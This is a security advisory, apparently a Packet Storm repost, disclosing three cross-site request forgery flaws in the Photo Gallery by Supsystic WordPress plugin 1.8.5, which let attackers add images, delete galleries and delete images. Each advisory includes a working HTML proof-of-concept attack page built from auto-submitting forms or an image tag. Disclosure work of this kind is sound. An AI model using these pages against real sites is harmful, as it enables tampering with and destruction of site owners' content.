WordPress Photo Gallery 1.8.5 Cross Site Request Forgery

2016-08-15T00:00:00
ID PACKETSTORM:138346
Type packetstorm
Reporter Securify B.V.
Modified 2016-08-15T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows  
adding of images  
------------------------------------------------------------------------  
Umit Aksu, July 2016  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
A Cross-Site Request Forgery vulnerability was found in the Photo  
Gallery by Supsystic WordPress Plugin. This issue can be used by an  
attacker to add images to a gallery.  
  
------------------------------------------------------------------------  
OVE ID  
------------------------------------------------------------------------  
OVE-20160722-0001  
  
------------------------------------------------------------------------  
Tested versions  
------------------------------------------------------------------------  
This issue was successfully tested on Photo Gallery by Supsystic  
WordPress Plugin version 1.8.5.  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
This issue is resolved in Photo Gallery by Supsystic version 1.8.6.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_adding_of_images.html  
  
This issue exists because Photo Gallery lacks protection against Cross-Site Request Forgery attacks. Due to this, it is possible to add images to a gallery. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.  
Proof of concept  
  
<html>  
<body>  
<form method="post" action="http://<target>/wp-admin/admin-ajax.php">  
<input type="hidden" name="action" value="grid-gallery">  
<input type="hidden" name="galleryId" value="5">  
<input type="hidden" name="attachType" value="gallery">  
<input type="hidden" name="folder_id" value="0">  
<input type="hidden" name="attachment_id" value="10">  
<input type="hidden" name="route[module]" value="photos">  
<input type="hidden" name="route[action]" value="add">  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
  
------------------------------------------------------------------------  
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows  
deleting of galleries  
------------------------------------------------------------------------  
Umit Aksu, July 2016  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
A Cross-Site Request Forgery vulnerability was found in the Photo  
Gallery by Supsystic WordPress Plugin. This issue can be used by an  
attacker to delete arbitrary gallleries.  
  
------------------------------------------------------------------------  
OVE ID  
------------------------------------------------------------------------  
OVE-20160722-0003  
  
------------------------------------------------------------------------  
Tested versions  
------------------------------------------------------------------------  
This issue was successfully tested on Photo Gallery by Supsystic  
WordPress Plugin version 1.8.5.  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
This issue is resolved in Photo Gallery by Supsystic version 1.8.6.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_deleting_of_galleries.html  
  
This issue exists because Photo Gallery lacks protection against Cross-Site Request Forgery attacks. Due to this, it is possible to delete arbitrary gallleries. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.  
Proof of concept  
  
<html>  
<body>  
<img src="http://<target>/wp-admin/admin.php?page=supsystic-gallery&module=galleries&action=delete&gallery_id=10 ">  
</body>  
</html>  
  
------------------------------------------------------------------------  
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows  
deleting of images  
------------------------------------------------------------------------  
Umit Aksu, July 2016  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
A Cross-Site Request Forgery vulnerability was found in the Photo  
Gallery by Supsystic WordPress Plugin. This issue can be used by an  
attacker to delete arbitrary images from the Photo Gallery.  
  
------------------------------------------------------------------------  
OVE ID  
------------------------------------------------------------------------  
OVE-20160722-0002  
  
------------------------------------------------------------------------  
Tested versions  
------------------------------------------------------------------------  
This issue was successfully tested on Photo Gallery by Supsystic  
WordPress Plugin version 1.8.5.  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
This issue is resolved in Photo Gallery by Supsystic version 1.8.6.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_deleting_of_images.html  
  
This issue exists because Photo Gallery lacks protection against Cross-Site Request Forgery attacks. Due to this, it is possible to delete images from an existing gallery. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.  
Proof of concept  
  
<html>  
<body>  
<form method="post" action="http://192.168.1.18/wp-admin/admin-ajax.php">  
<input type="hidden" name="action" value="grid-gallery">  
<input type="hidden" name="gallery_id" value="2">  
<input type="hidden" name="ids[]" value="5">  
<input type="hidden" name="ids[]" value="7">  
<input type="hidden" name="route[module]" value="galleries">  
<input type="hidden" name="route[action]" value="deleteResource">  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
`